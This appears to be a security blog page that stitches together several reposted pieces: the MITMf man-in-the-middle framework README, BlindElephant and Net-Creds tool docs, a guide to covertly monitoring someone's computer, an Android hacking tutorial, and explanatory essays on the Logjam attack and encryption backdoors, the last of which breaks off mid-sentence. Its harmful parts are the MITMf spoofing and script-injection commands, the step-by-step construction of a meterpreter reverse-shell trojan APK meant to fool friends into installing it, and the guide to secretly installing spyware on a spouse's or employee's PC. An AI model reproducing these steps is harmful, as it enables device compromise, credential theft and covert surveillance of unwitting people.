# Never Ending Security

It starts all here

# MITMf

Framework for Man-In-The-Middle attacks

Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki .

# Installation

MITMf relies on a LOT of external libraries therefore it is highly recommended you use virtualenvs to install the framework, this avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

• On Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo

• On Debian and derivatives (e.g Ubuntu, Kali Linux etc…)
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev


# Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

• Install virtualenvwrapper:
pip install virtualenvwrapper

• Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh


The location of this script may vary depending on your Linux distro

• Restart your terminal or run:
source /usr/bin/virtualenvwrapper.sh

mkvirtualenv MITMf -p /usr/bin/python2.7

• Clone the MITMf repository:
git clone https://github.com/byt3bl33d3r/MITMf

• cd into the directory, initialize and clone the repos submodules:
cd MITMf && git submodule init && git submodule update --recursive

• Install the dependencies:
pip install -r requirements.txt

python mitmf.py --help

# Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it’s been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

# Features

• The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
• As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
• The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
• MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
• Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

# Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
log.info('Got an ICMP packet!')
packet.dst = '192.168.1.0'
• Use the packet variable to access the packet in a Scapy compatible format
• Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!

# Examples

The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

# Currently available plugins

• HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
• SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
• ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
• Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
• SSLstrip+ : Partially bypass HSTS
• Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
• BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
• AppCachePoison : Performs HTML5 App-Cache poisoning attacks
• Ferret-NG : Transperently hijacks client sessions
• BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
• FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
• Inject : Inject arbitrary content into HTML content
• BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
• JSkeylogger : Injects a Javascript keylogger into a client’s webpages
• Replace : Replace arbitary content in HTML content
• SMBAuth : Evoke SMB challenge-response authentication attempts
• Upsidedownternet : Flips images 180 degrees

More information can be found on: https://github.com/byt3bl33d3r/MITMf

## BlindElephant Web Application Fingerprinter

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant

### Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

#### Pre-requisites:

• Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

#### Get the code:

• Browse SVN
• Checkout via SVN: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant

#### Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your python installation has distutils, and then do:cd blindelephant/srcsudo python setup.py install(Windows users, omit sudo)

#### Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

$BlindElephant.py Usage: BlindElephant.py [options] url appName Options: -h, --help show this help message and exit -p PLUGINNAME, --pluginName=PLUGINNAME Fingerprint version of plugin (should apply to web app given in appname) -s, --skip Skip fingerprinting webpp, just fingerprint plugin -n NUMPROBES, --numProbes=NUMPROBES Number of files to fetch (more may increase accuracy). Default: 15 -w, --winnow If more than one version are returned, use winnowing to attempt to narrow it down (up to numProbes additional requests). -l, --list List supported webapps and plugins Use "guess" as app or plugin name to attempt to attempt to discover which supported apps/plugins are installed.$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM


$python >>> from blindelephant.Fingerprinters import WebAppFingerprinter >>> >>> #Construct the fingerprinter >>> #use default logger pointing to console; can pass "logger" arg to change output >>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype") >>> #do the fingerprint; data becomes available as instance vars >>> fp.fingerprint() (same as above) >>> print "Possible versions:", fp.ver_list Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')] >>> print "Max possible version: ", fp.best_guess Max possible version: 4.23-en-COM  ### The Static File Fingerprinting Approach in One Picture #### Other Projects Like This More information about BlindElephant can be found on: http://blindelephant.sourceforge.net ## Net-Creds – Sniffs Sensitive Data From Interface Or Pcap Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Screenshots ### Sniffs • URLs visited • POST loads sent • HTTP form logins/passwords • HTTP basic auth logins/passwords • HTTP searches • FTP logins/passwords • IRC logins/passwords • POP logins/passwords • IMAP logins/passwords • Telnet logins/passwords • SMTP logins/passwords • SNMP community string • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc • Kerberos ### Examples Auto-detect the interface to sniff sudo python net-creds.py Choose eth0 as the interface sudo python net-creds.py -i eth0 Ignore packets to and from 192.168.0.2 sudo python net-creds.py -f 192.168.0.2 Read from pcap python net-creds.py -p pcapfile #### OSX Credit to epocs: sudo easy_install pip sudo pip install scapy sudo pip install pcapy brew install libdnet --with-python mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth sudo pip install pypcap brew tap brona/iproute2mac brew install iproute2mac  Then replace line 74 ‘/sbin/ip’ with ‘/usr/local/bin/ip’. More Info On: https://github.com/DanMcInerney/net-creds ## How To Monitor a Remote Computer For Free Do you want to monitor a remote computer for free? If the answer is yes,….. YOU CAN DO IT! This article is full of tricks and tips that you can use to monitor a remote computer for FREE. ## 1. Monitor a Computer Remotely with Ammy Admin Ammy admin is a popular software used for remote system administration and educational purposes. You can easily turn this innocent looking software into a spy that allows you to see what’s going on at a remote PC. Here is how to do it: 1. Download Ammy Admin [If the link is not working, use this MediaFire link: Download Ammy Admin] 2. Run the program on the computer you want to monitor. A window will appear: 3. Remember or write down the ID of the PC which is shown in the green field “Your ID”. Then go to Ammy > Settings. Another window will popup: 4. Uncheck all the checkboxes except the first one (see the above image). Then click on “Access Permissions” button. (If you want to test the video performance, use the “Video system speed test” button). Another window will popup: 5. Uncheck “Protect these settings from remote computer” and then click on the plus button. A small window will appear: 6. Enter a password and then confirm the password. Click on the “OK” button. Then click “OK” again to save the access permissions. 7. In the main menu, go to Ammy > Service > Install. Ammy Admin will display a message like this: 8. Go to Ammy > Service > Start. Then close the application. Ammy admin will will automatically run in hidden mode when Windows starts up. 9. Run Ammy Admin on the the computer from which you want to monitor the remote PC. 10. Enter the ID of the child computer on the “client ID/IP” field. Then check “View only” box and click on the “Connect” button. 11. Ammy admin will display a password box: 12. Enter the password that you set up while configuring remote PC and then click on “OK” button. 13. Wait for some time, it will establish a connection to the remote PC and display the live screen: If you want to listen what’s going on at remote PC, click “voice chat” button on the control panel of remote desktop window. You can also access files in the remote PC by using the “File Manager” button. You can also turn your PC into a wireless remote control of the distant computer by unchecking the “View only” option. Let’s move onto the technique #2 ## 2. Monitor a Computer Remotely with ActivTrak ActivTrack is a cloud based monitoring service that you can use to spy on children, employees or spouse. The company also offers paid plans, but here we are using a free account! Let’s start! 1. Go to activtrak.com. You will see a page like the below one: 2. Enter your email address and then click on “Free Secure Signup”. Wait for some seconds, you will see a pop up box like this: 3. Enter your name, password, and organization name, and click on “OK”. Then download the ActivTrak Agent (click on the “Download ActivTrak Agent” button). 4. After downloading the ActivTrak Agent.msi, install it on the remote computers you want to monitor. 5. Done! go to your computer and then visit https://app.activtrak.com/Account/login. Login with your email and password. You will see the real time activities of the remote computer: You can also use this free account as a remote control for your distant PC, but with less features compared to Ammy Admin. Problems with the free account are, limited screenshots, “only 3 agents”, “only for one user” and 3GB limited storage. But if you are ready to pay for the service, you can get features like unlimited screenshots, unlimited users, unlimited storage, remote installer, support by phone, data export and ad free experience. So, if you are going to upgrade your account or create a premium account, click on the below banner (It will help us to pay our bills): If you have a suspicion that you are being monitored, check all the processes in the task manager and then use Detekt to scan your computer. Also use an on-screen keyboard to enter usernames and passwords. ## How To Remotely Hack Android using Kali Linux This is a tutorial explaining how to hack android phones with Kali. I can’t see any tutorials explaining this Hack/Exploit, so, I made one. (Still ,you may already know about this) ## Step 1: Fire-Up Kali: • Open a terminal, and make a Trojan .apk • You can do this by typing : • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) ## Step 2: Open Another Terminal: • Open another terminal until the file is being produced. • Load metasploit console, by typing : msfconsole ## Step 3: Set-Up a Listener: • After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) ## Step 4: Exploit! • At last type: exploit to start the listener. • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone. • Then send it using Uploading it to Dropbox or any sharing website (like:www.speedyshare.com). • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET) • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone) • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install. • And when he clicks Open… ## Step 5: BOOM! There comes the meterpreter prompt: See Meterpreter commands here: http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics ## The Logjam Attack In case you haven’t heard, there’s a new SSL/TLS vulnerability making the rounds. Nicknamed Logjam, the new attack is ‘special’ in that it may admit complete decryption or hijacking of any TLS connection you make to an improperly configured web or mail server. Worse, there’s at least circumstantial evidence that similar (and more powerful) attacks might already be in the toolkit of some state-level attackers such as the NSA. This work is the result of an unusual collaboration between a fantastic group of co-authors spread all around the world, including institutions such as the University of Michigan, INRIA Paris-Rocquencourt, INRIA Paris-Nancy, Microsoft Research, Johns Hopkins and the University Of Pennsylvania. It’s rare to see this level of collaboration between groups with so many different areas of expertise, and I hope to see a lot more like it. (Disclosure: I am one of the authors.) The absolute best way to understand the Logjam result is to read the technical research paper. This post is mainly aimed at people who want a slightly less technical form. For those with even shorter attention spans, here’s the TL;DR: It appears that the the Diffie-Hellman protocol, as currently deployed in SSL/TLS, may be vulnerable to a serious downgrade attack that restores it to 1990s “export” levels of security, and offers a practical “break” of the TLS protocol against poorly configured servers. Even worse, extrapolation of the attack requirements — combined with evidence from the Snowden documents — provides some reason to speculate that a similar attack could be leveraged against protocols (including TLS, IPSec/IKE and SSH) using 768- and 1024-bit Diffie-Hellman. I’m going to tackle this post in the usual ‘fun’ question-and-answer format I save for this sort of thing. What is Diffie-Hellman and why should I care about TLS “export” ciphersuites? Diffie-Hellman is probably the most famous public key cryptosystem ever invented. Publicly discovered by Whit Diffie and Martin Hellman in the late 1970s (and a few years earlier, in secret, by UK GCHQ), it allows two parties to negotiate a shared encryption key over a public connection. Diffie-Hellman is used extensively in protocols such as SSL/TLS and IPSec, which rely on it to establish the symmetric keys that are used to transport data. To do this, both parties must agree on a set of parameters to use for the key exchange. In traditional (‘mod p‘) Diffie-Hellman, these parameters consist of a large prime number p, as well as a ‘generator’ g. The two parties now exchange keys as shown below:  Classical Diffie-Hellman (source). TLS supports several variants of Diffie-Hellman. The one we’re interested in for this work is the ‘ephemeral’ non-elliptic (“DHE”) protocol variant, which works in a manner that’s nearly identical to the diagram above. The server takes the role of Alice, selecting (p, g, ga mod p)and signing this tuple (and some nonces) using its long-term signing key. The client responds gb mod p and the two sides then calculate a shared secret. Just for fun, TLS also supports an obsolete ‘export’ variant of Diffie-Hellman. These export ciphersuites are a relic from the 1990s when it was illegal to ship strong encryption out of the country. What you need to know about “export DHE” is simple: it works identically to standard DHE, but limits the size of p to 512 bits. Oh yes, and it’s still out there today. Because the Internet. How do you attack Diffie-Hellman? The best known attack against a correct Diffie-Hellman implementation involves capturing the value gand solving to find the secret key a. The problem of finding this value is known as the discrete logarithm problem, and it’s thought to be a mathematically intractable, at least when Diffie-Hellman is implemented in cryptographically strong groups (e.g., when p is of size 2048 bits or more). Unfortunately, the story changes dramatically when p is relatively small — for example, 512 bits in length. Given a value gmod p for a 512-bit p, itshould at least be possible to efficiently recover the secret a and read traffic on the connection. Most TLS servers don’t use 512-bit primes, so who cares? The good news here is that weak Diffie-Hellman parameters are almost never used purposely on the Internet. Only a trivial fraction of the SSL/TLS servers out there today will organically negotiate 512-bit Diffie-Hellman. For the most part these are crappy embedded devices such as routers and video-conferencing gateways. However, there is a second class of servers that are capable of supporting 512-bit Diffie-Hellman when clients request it, using a special mode called the ‘export DHE’ ciphersuite. Disgustingly, these servers amount to about 8% of the Alexa top million sites (and a whopping 29% of SMTP/STARTLS mail servers). Thankfully, most decent clients (AKA popular browsers) won’t willingly negotiate ‘export-DHE’, so this would also seem to be a dead end. It isn’t.  ServerKeyExchange message (RFC 5246) You see, before SSL/TLS peers can start engaging in all this fancy cryptography, they first need to decide which ciphers they’re going to use. This is done through a negotiation process in which the client proposes some options (e.g., RSA, DHE, DHE-EXPORT), and the server picks one. This all sound simple enough. However, one of the early, well known flaws in SSL/TLS is the protocol’s failure to properly authenticate these ‘negotiation’ messages. In very early versions of SSL they were not authenticated at all. SSLv3 and TLS tacked on an authentication process — but one that takes place only at the end of the handshake.* This is particularly unfortunate given that TLS servers often have the ability to authenticate their messages using digital signatures, but don’t really take advantage of this. For example, when two parties negotiate Diffie-Hellman, the parameters sent by the server are transmitted within a signed message called the ServerKeyExchange (shown at right). The signed portion of this message covers the parameters, but neglects to include any information about which ciphersuite the server thinks it’s negotiating. If you remember that the only difference between DHE and DHE-EXPORT is the size of the parameters the server sends down, you might start to see the problem. Here it is in a nutshell: if the server supports DHE-EXPORT, the attacker can ‘edit’ the negotiation messages sent from the a client — even if the client doesn’t support export DHE — replacing the client’s list of supported ciphers with only export DHE. The server will in turn send back a signed 512-bit export-grade Diffie-Hellman tuple, which the client will blindly accept — because it doesn’t realize that the server is negotiating the export version of the ciphersuite.From its perspective this message looks just like ‘standard’ Diffie-Hellman with really crappy parameters.  Overview of the Logjam active attack (source: paper). All this tampering should run into a huge snag at the end of the handshake, when he client and server exchange Finished messages embedding include a MAC of the transcript. At this point the client should learn that something funny is going on, i.e., that what it sent no longer matches what the server is seeing. However, the loophole is this: if the attacker can recover the Diffie-Hellman secret quickly — before the handshake ends — she can forge her own Finished messages. In that case the client and server will be none the wiser. The upshot is that executing this attack requires the ability to solve a 512-bit discrete logarithm before the client and server exchange Finished messages. That seems like a tall order. Can you really solve a discrete logarithm before a TLS handshake times out? In practice, the fastest route to solving the discrete logarithm in finite fields is via an algorithm called the Number Field Sieve (NFS). Using NFS to solve a single 512-bit discrete logarithm instance requires several core-years — or about week of wall-clock time given a few thousand cores — which would seem to rule out solving discrete logs in real time. However, there is a complication. In practice, NFS can actually be broken up into two different steps: 1. Pre-computation (for a given prime p). This includes the process of polynomial selection, sieving, and linear algebra, all of which depend only on p. The output of this stage is a table for use in the second stage. 2. Solving to find a (for a given gmod p). The final stage, called the descent, uses the table from the precomputation. This is the only part of the algorithm that actually involves a specific g and ga. The important thing to know is that the first stage of the attack consumes the vast majority of the time, up to a full week on a large-scale compute cluster. The descent stage, on the other hand, requires only a few core-minutes. Thus the attack cost depends primarily on where the server gets its Diffie-Hellman parameters from. The best case for an attacker is when p is hard-coded into the server software and used across millions of machines. The worst case is when p is re-generated routinely by the server. I’ll let you guess what real TLS servers actually do. In fact, large-scale Internet scans by the team at University of Michigan show that most popular web servers software tends to re-use a small number of primes across thousands of server instances. This is done because generating prime numbers is scary, so implementers default to using a hard-coded value or a config file supplied by your Linux distribution. The situation for export Diffie-Hellman is particularly awful, with only two (!) primes used across up 92% of enabled Apache/mod_ssl sites.  Number of seconds to solve a 512-bit discrete log (source: paper). The upshot of all of this is that about two weeks of pre-computation is sufficient to build a table that allows you to perform the downgrade against most export-enabled servers in just a few minutes (see the chart at right). This is fast enough that it can be done before the TLS connection timeout. Moreover, even if this is not fast enough, the connection can often be held open longer by using clever protocol tricks, such as sending TLS warning messages to reset the timeout clock. Keep in mind that none of this shared prime craziness matters when you’re using sufficiently large prime numbers (on the order of 2048 bits or more). It’s only a practical issue you’re using small primes, like 512-bit, 768-bit or — and here’s a sticky one I’ll come back to in a minute — 1024 bit. How do you fix the downgrade to export DHE? The best and most obvious fix for this problem is to exterminate export ciphersuites from the Internet. Unfortunately, these awful configurations are the default in a number of server software packages (looking at you Postfix), and getting people to update their configurations is surprisingly difficult (see e.g., FREAK). A simpler fix is to upgrade the major web browsers to resist the attack. The easy way to do this is to enforce a larger minimum size for received DHE keys. The problem here is that the fix itself causes some collateral damage — it will break a small but significant fraction of lousy servers that organically negotiate (non-export) DHE with 512 bit keys. The good news here is that the major browsers have decided to break the Internet (a little) rather than allow it to break them. Each has agreed to raise the minimum size limit to at least 768 bits, and some to a minimum of 1024 bits. It’s still not perfect, since 1024-bit DHE may not be cryptographically sound against powerful attackers, but it does address the immediate export attack. In the longer term the question is whether to use larger negotiated DHE groups, or abandon DHE altogether and move to elliptic curves. What does this mean for larger parameter sizes? The good news so far is that 512-bit Diffie-Hellman is only used by a fraction of the Internet,even when you account for active downgrade attacks. The vast majority of servers use Diffie-Hellman moduli of length at least 1024 bits. (The widespread use of 1024 is largely due to a hard-cap in older Java clients. Go away Java.) While 2048-bit moduli are generally believed to be outside of anyone’s reach, 1024-bit DHE has long been considered to be at least within groping range of nation-state attackers. We’ve known this for years, of course, but the practical implications haven’t been quite clear. This paper tries to shine some light on that, using Internet-wide measurements and software/hardware estimates. If you recall from above, the most critical aspect of the NFS attack is the need to perform large amounts of pre-computation on a given Diffie-Hellman prime p, followed by a relatively short calculation to break any given connection that uses p. At the 512-bit size the pre-computation only requires about a week. The question then is, how much does it cost for a 1024-bit prime, and how common are shared primes? While there’s no exact way to know how much the 1024-bit attack would cost, the paper attempts to provide some extrapolations based on current knowledge. With software, the cost of the pre-computation seems quite high — on the order of 35 million core-years. Making this happen for a given prime within a reasonable amount of time (say, one year) would appear to require billions of dollars of computing equipment if we assume no algorithmic improvements.Even if we rule out such improvements, it’s conceivable that this cost might be brought down to a few hundred million dollars using hardware. This doesn’t seem out of bounds when you consider leaked NSA cryptanalysis budgets. What’s interesting is that the descent stage, required to break a given Diffie-Hellman connection, is much faster. Based on some implementation experiments by the CADO-NFSteam, it may be possible to break a Diffie-Hellman connection in as little as 30 core-days, with parallelization hugely reducing the wall-clock time. This might even make near-real-time decryption of Diffie-Hellman connections practical. Is the NSA actually doing this? So far all we’ve noted is that NFS pre-computation is at least potentially feasible when 1024-bit primes are re-used. That doesn’t mean the NSA is actually doing any of it. There is some evidence, however, that suggests the NSA has decryption capability that’s at least consistent with such a break. This evidence comes from a series of Snowden documents published last winter in Der Spiegel. Together they describe a large-scale effort at NSA and GCHQ, capable of decrypting ‘vast’ amounts of Internet traffic, including IPSec, SSH and HTTPS connections.  NSA slide illustrating exploitation of IPSec encrypted traffic (source: Spiegel). While the architecture described by the documents mentions attacks against many protocols, the bulk of the energy seems to be around the IPSec and IKE protocols, which are used to establish Virtual Private Networks (VPNs) between individuals and corporate networks such as financial institutions. The nature of the NSA’s exploit is never made clear in the documents, but diagram at right gives a lot of the architectural details. The system involves collecting Internet Key Exchange (IKE) handshakes, transmitting them to the NSA’s Cryptanalysis and Exploitation Services (CES) enclave, and feeding them into a decryption system that controls substantial high performance computing resources to process the intercepted exchanges. This is at least circumstantially consistent with Diffie-Hellman cryptanalysis. Of course it’s entirely possible that the attack is based on a bad random number generator, weak symmetric encryption, or any number of engineered backdoors. There are a few pieces of evidence that militate towards a Diffie-Hellman break, however: 1. IPSec (or rather, the IKE key exchange) uses Diffie-Hellman for every single connection, meaning that it can’t be broken without some kind of exploit, although this doesn’t rule out the other explanations. 2. The IKE exchange is particularly vulnerable to pre-computation, since IKE uses a small number of standardized prime numbers called the Oakley groups, which are going on 17 years old now. Large-scale Internet scanning by the Michigan team shows that a majority of responding IPSec endpoints will gladly negotiate using Oakley Group 1 (768 bit) or Group 2 (1024 bit), even when the initiator offers better options. 3. The NSA’s exploit appears to require the entire IKE handshake as well as any pre-shared key (PSK). These inputs would be necessary for recovery of IKEv1 session keys, but are not required in a break that involves only symmetric cryptography. 4. The documents explicitly rule out the use of malware, or rather, they show that such malware (‘TAO implants’) is in use — but that malware allows the NSA to bypass the IKE handshake altogether. I would stipulate that beyond the Internet measurements and computational analysis, this remains firmly in the category of ‘crazy-eyed informed speculation’. But while we can’t rule out other explanations, this speculation is certainly consistent with a hardware-optimized break of Diffie-Hellman 768 and 1024-bit, along with some collateral damage to SSH and related protocols. So what next? The paper gives a detailed set of recommendations on what to do about these downgrade attacks and (relatively) weak DHE groups. The website provides a step-by-step guide for server administrators. In short, probably the best long-term move is to switch to elliptic curves (ECDHE) as soon as possible. Failing this, clients and servers should enforce at least 2048-bit Diffie-Hellman across the Internet. If you can’t do that, stop using common primes. Making this all happen on anything as complicated as the Internet will probably consume a few dozen person-lifetimes. But it’s something we have to do, and will do, to make the Internet work properly. Notes: * There are reasons for this. Some SSL/TLS ciphersuites (such as the RSA encryption-based ciphersuites) don’t use signatures within the protocol, so the only way to authenticate the handshake is to negotiate a ciphersuite, run the key exchange protocol, then use the resulting shared secret to authenticate the negotiation messages after the fact. But SSL/TLS DHE involves digital signatures, so it should be possible to achieve a stronger level of security than this. It’s unfortunate that the protocol does not. ## How Do We Build Encryption Backdoors? They say that history repeats itself, first as tragedy, then as farce. Never has this principle been more apparent than in this new piece by Washington Post reporters Ellen Nakashima and Barton Gellman: ‘As encryption spreads, U.S. grapples with clash between privacy, security‘. The subject of the piece is a renewed effort by U.S. intelligence and law enforcement agencies to mandate ‘backdoors’ in modern encryption systems. This is ostensibly a reaction to the mass adoption of strong encryption in smartphones, and a general fear that police are about to lose wiretapping capability they’ve come to depend on. This is not the first time we’ve been here. Back in the 1990s the Federal government went as far as to propose a national standard for ‘escrowed’ telephone encryption called the ‘Clipper’ chip. That effort failed in large part because the technology was terrible, but also because — at least at the time — the idea of ordinary citizens adopting end-to-end encryption was basically science fiction. Thanks to the advent of smartphones and ‘on-by-default’ encryption in popular systems like Apple’s iMessage, and WhatsApp, Americans are finally using end-to-end encryption at large scale and seem to like it. This is scaring the bejesus out of the powers that be. Hence crypto backdoors. As you might guess, I have serious philosophical objections to the idea of adding backdoors to any encryption system — for excellent reasons I could spend thousands of words on. But I’m not going to do that. What I’d like to do in this post is put aside my own value judgements and try to take these government proposals at face value. Thus the question I’m going to consider in this post: Let’s pretend that encryption backdoors are a great idea. From a purely technical point of view, what do we need to do to implement them, and how achievable is it? First some background. End-to-end encryption 101 Modern encryption schemes break down into several categories. For the purposes of this discussion we’ll consider two: those systems for which the provider holds the key, and the set of systems where the provider doesn’t. We’re not terribly interested in the first type of encryption, which includes protocols like SSL/TLS and Google Hangouts, since those only protect data at the the link layer, i.e.,until it reaches your provider’s servers. I think it’s fairly well established that if Facebook, Apple, Google or Yahoo can access your data, then the government can access it as well — simply by subpoenaing or compelling those companies. We’ve even seen how this can work. The encryption systems we’re interested all belong to the second class — protocols where even the provider can’t decrypt your information. This includes: This seems like a relatively short list, but in practice w’re talking about an awful lot of data. The iMessage and WhatsApp systems alone process billions of instant messages every day, and Apple’s device encryption is on by default for everyone with a recent(ly updated) iPhone. How to defeat end-to-end encryption If you’ve decided to go after end-to-end encryption through legal means, there are a relatively small number of ways to proceed. By far the simplest is to simply ban end-to-end crypto altogether, or to mandate weak encryption. There’s some precedent for this: throughout the 1990s, the NSA forced U.S. companies to ship ‘export‘ grade encryption that was billed as being good enough for commercial use, but weak enough for governments to attack. The problem with this strategy is that attacks only get better — but legacy crypto never dies. Fortunately for this discussion, we have some parameters to work with. One of these is that Washington seems to genuinely want to avoid dictating technological designs to Silicon Valley. More importantly, President Obama himself has stated that “there’s no scenario in which we don’t want really strong encryption“. Taking these statements at face value should mean that we can exclude outright crypto bans, mandated designs, and any modification has the effect of fundamentally weakening encryption against outside attackers. If we mix this all together, we’re left with only two real options: 1. Attacks on key distribution. In systems that depend on centralized, provider-operated key servers, such as WhatsApp, Facetime, Signal and iMessage,** governments can force providers to distribute illegitimate public keys, or register shadow devices to a user’s account. This is essentially a man-in-the-middle attack on encrypted communication systems. 2. Key escrow. Just about any encryption scheme can be modified to encrypt a copy of a decryption (or session) key such that a ‘master keyholder’ (e.g., Apple, or the U.S. government) can still decrypt. A major advantage is that this works even for device encryption systems, which have no key servers to suborn. Each approach requires some modifications to clients, servers or other components of the system. Attacking key distribution  Key lookup request for Apple iMessage. The phone number is shown at top right, and the response at bottom left. Many end-to-end encrypted messaging systems, including WhatsApp and iMessage, generate a long-term public and secret keypair for every device you own. The public portion of this keypair is distributed to anyone who might want to send you messages. The secret key never leaves the device. Before you can initiate a connection with your intended recipient, you first have to obtain a copy of the recipient’s public key. This is commonly handled using a key server that’s operated by the provider. The key server may hand back one, or multiple public keys (depending on how many devices you’ve registered). As long as those keys all legitimately belong to your intended recipient, everything works fine. Intercepting messages is possible, however, if the provider is willing to substitute its own public keys — keys for which it (or the government) actually knows the secret half. In theory this is relatively simple — in practice it can be something of a bear, due to the high complexity of protocols such as iMessage.  Key fingerprints. The main problem with key distribution attacks is — unlike a traditional wiretap — substitute keys are at least in theory detectable by the target. Some communication systems, like Signal, allow users to compare key fingerprints in order to verify that each received the right public key. Others, like iMessage and WhatsApp, don’t offer this technology — but could easily be modified to do so (even using third party clients). Systems like CONIKS may even automate this process in the future — allowing applications to monitor changes to their own keys in real time as they’re distributed by a server. A final, and salient feature on the key distribution approach is that it allows only prospective eavesdropping — that is, law enforcement must first target a particular user, and only then can they eavesdrop on her connections. There’s no way to look backwards in time. I see this is a generally good thing. Others may disagree. Key Escrow  Structure of the Clipper ‘LEAF’. The techniques above don’t help much for systems without public key servers, Moreover, they do nothing for systems that don’t use public keys at all, the prime example being device 